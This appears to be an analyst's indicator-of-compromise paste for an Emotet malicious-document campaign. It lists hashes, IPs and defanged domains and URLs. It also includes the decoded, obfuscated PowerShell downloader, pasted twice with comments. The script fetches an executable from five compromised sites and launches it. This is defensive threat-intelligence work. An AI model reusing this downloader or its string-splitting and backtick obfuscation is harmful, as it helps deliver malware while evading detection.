paladin316

Emotet_Doc_out_2019-10-09_22_14.txt

Oct 9th, 2019
  1. #Emotet #Docs #malware #OSINT #IOC
  2.  
  3. MD5:
  4. 04469ecb3f765955f82a93379acc2524
  5. 11c36b543e3e97c6680d435c320d4d67
  6. 21d208257e8f31ee15a3932667c68cd4
  7. 375846b79a13f123c26bdb86946cc64a
  8. 42341718bf29a12779f32a0acf7d7bcd
  9. e5666d50036a170e531cc66bf36d277c
  10. 65742f9577704d7c979591348b733263
  11. 8a19585d708831afe179fabd1bc08bad
  12. 4f3063fbabd26cb3438a4a8c9c85a87c
  13. 8c4586bda7ad1334e13f34da54bc93a5
  14. cfb022a24ff5f5e53b3ca65af95cb955
  15. d106bdf1e942b1a93c30cc1bd1b05fcb
  16. e1d2e9184df6b6a9ca2a86b611e082cc
  17. f1212f1494b917465cf53d42447b17b5
  18.  
  19.  
  20. IPs:
  21. 101.50.1.27
  22. 139.162.43.93
  23. 146.88.234.116
  24. 160.153.131.188
  25. 160.153.72.33
  26. 166.62.103.202
  27. 176.58.102.35
  28. 35.238.93.185
  29. 43.255.154.26
  30. 45.56.101.4
  31.  
  32.  
  33. Domains:
  34. boomenergyng.com
  35. e-centricity.com
  36. flowerbodysports.com
  37. flyadriatic.co.nz
  38. newagesl.com
  39. stephporn.com
  40. thehopeherbal.com
  41. www.bundlesbyb.com
  42. www.crookedchristicraddick.com
  43. www.westburydentalcare.com
  44.  
  45.  
  46. URLs (the list is pasted twice below; the www.microsoft.com entry is the text of the `<# … #>` block comment in the decoded script, not a download location):
  47. hxxps://www.microsoft.com/ #> $b000532c400=
  48. hxxp://stephporn.com/cgi-bin/oSWSyiKNzf/
  49. hxxps://thehopeherbal.com/tropica/PAbLPQBS/
  50. hxxps://e-centricity.com/css/zcnIdWUhbd/
  51. hxxps://newagesl.com/cgi-bin/WEHqDwjwS/
  52. hxxp://www.westburydentalcare.com/wp-content/hvg1k_1dr5cd-999/
  53. hxxps://www.microsoft.com/ #> $b000532c400=
  54. hxxp://stephporn.com/cgi-bin/oSWSyiKNzf/
  55. hxxps://thehopeherbal.com/tropica/PAbLPQBS/
  56. hxxps://e-centricity.com/css/zcnIdWUhbd/
  57. hxxps://newagesl.com/cgi-bin/WEHqDwjwS/
  58. hxxp://www.westburydentalcare.com/wp-content/hvg1k_1dr5cd-999/
  59.  
  60.  
  61. Decoded Base64 PowerShell (the same script is pasted twice back to back; the second copy begins mid-line, right after 'x610780522b80'):
  # Analyst notes (review): decoded second stage from the Emotet maldoc. The whole
  # thing is a download-and-run loop (line 75 onward); everything else is padding.
  # The `<# … #>` block comment on line 62 is a decoy: www.microsoft.com is never
  # contacted. The script is pasted twice; the second copy starts mid-line after
  # 'x610780522b80' on line 80 and is byte-identical to the first.
  # Detection-relevant artifacts visible in the code: drop path %USERPROFILE%\178.exe,
  # Net.WebClient created from a PowerShell host, and a process started from that path.
  62. <# hxxps://www.microsoft.com/ #> $b000532c400='b004494x456';
  # '178' becomes the dropped file's base name (see line 65).
  63. $c2574c24817 = '178';
  # Dead assignment; never read. The other random-looking single-use variables below
  # ($x3273486252, $x0780x962x0, $xc2338c44407, $b03397108170c, $c3606400230,
  # $c06000x0c3903) are the same kind of filler.
  64. $b7b47x300671c='b4703845100';
  # Destination path for the download: %USERPROFILE%\178.exe
  65. $c8168c84395=$env:userprofile+'\'+$c2574c24817+'.exe';
  66. $x3273486252='c030c7500x029';
  # The cmdlet name is assembled from fragments ('new-ob'+'je'+'ct' -> New-Object) and
  # invoked with &, so a plain-text match on "New-Object Net.WebClient" will not fire;
  # PowerShell script block logging (Event ID 4104) still records the resolved command.
  67. $c69c008420c=&('new-ob'+'je'+'ct') nEt.wEBCLIenT;
  # Five candidate download URLs in one newline-separated string literal. The
  # backtick-escaped method name "s`PlIT" resolves to .Split, and its argument (the
  # text between ('  and  ') on lines 72-73) is a literal newline, so this yields an
  # array of five URLs. Do not break these lines: they are inside the literal.
  68. $b0504bcc6bc08='hxxp://stephporn.com/cgi-bin/oSWSyiKNzf/
  69. hxxps://thehopeherbal.com/tropica/PAbLPQBS/
  70. hxxps://e-centricity.com/css/zcnIdWUhbd/
  71. hxxps://newagesl.com/cgi-bin/WEHqDwjwS/
  72. hxxp://www.westburydentalcare.com/wp-content/hvg1k_1dr5cd-999/'."s`PlIT"('
  73. ');
  74. $x0780x962x0='b1032704c48';
  # Tries each URL in order. "dOW`NLo`AdFi`Le" resolves to WebClient.DownloadFile(url, path),
  # writing straight to the %USERPROFILE% path built on line 65.
  75. foreach($cbc7139x96b in $b0504bcc6bc08){try{$c69c008420c."dOW`NLo`AdFi`Le"($cbc7139x96b, $c8168c84395);
  76. $xc2338c44407='c5b020147b70b';
  # Only launches the file if (Get-Item path).Length is at least 26538 bytes — presumably
  # to skip short error pages or dead-host responses (TODO confirm against the actual
  # payload size). 'G'+'e'+'t-Item' and "leN`g`TH" are the same concatenation/backtick
  # obfuscation as above; "Sta`Rt" resolves to [Diagnostics.Process]::Start.
  77. If ((&('G'+'e'+'t-Item') $c8168c84395)."leN`g`TH" -ge 26538) {[Diagnostics.Process]::"Sta`Rt"($c8168c84395);
  78. $b03397108170c='c7000b74640';
  # Stops after the first successful launch. The empty catch{} on line 80 swallows any
  # download/launch failure so the loop silently moves on to the next URL; a host with
  # all five domains blocked leaves a zero-length or absent 178.exe and no process.
  79. break;
  80. $c3606400230='xbb22200041'}}catch{}}$c06000x0c3903='x610780522b80'<# hxxps://www.microsoft.com/ #> $b000532c400='b004494x456';
  # ---- second, identical copy of the script (it began mid-line above, after 'x610780522b80') ----
  81. $c2574c24817 = '178';
  82. $b7b47x300671c='b4703845100';
  83. $c8168c84395=$env:userprofile+'\'+$c2574c24817+'.exe';
  84. $x3273486252='c030c7500x029';
  85. $c69c008420c=&('new-ob'+'je'+'ct') nEt.wEBCLIenT;
  86. $b0504bcc6bc08='hxxp://stephporn.com/cgi-bin/oSWSyiKNzf/
  87. hxxps://thehopeherbal.com/tropica/PAbLPQBS/
  88. hxxps://e-centricity.com/css/zcnIdWUhbd/
  89. hxxps://newagesl.com/cgi-bin/WEHqDwjwS/
  90. hxxp://www.westburydentalcare.com/wp-content/hvg1k_1dr5cd-999/'."s`PlIT"('
  91. ');
  92. $x0780x962x0='b1032704c48';
  93. foreach($cbc7139x96b in $b0504bcc6bc08){try{$c69c008420c."dOW`NLo`AdFi`Le"($cbc7139x96b, $c8168c84395);
  94. $xc2338c44407='c5b020147b70b';
  95. If ((&('G'+'e'+'t-Item') $c8168c84395)."leN`g`TH" -ge 26538) {[Diagnostics.Process]::"Sta`Rt"($c8168c84395);
  96. $b03397108170c='c7000b74640';
  97. break;
  98. $c3606400230='xbb22200041'}}catch{}}$c06000x0c3903='x610780522b80'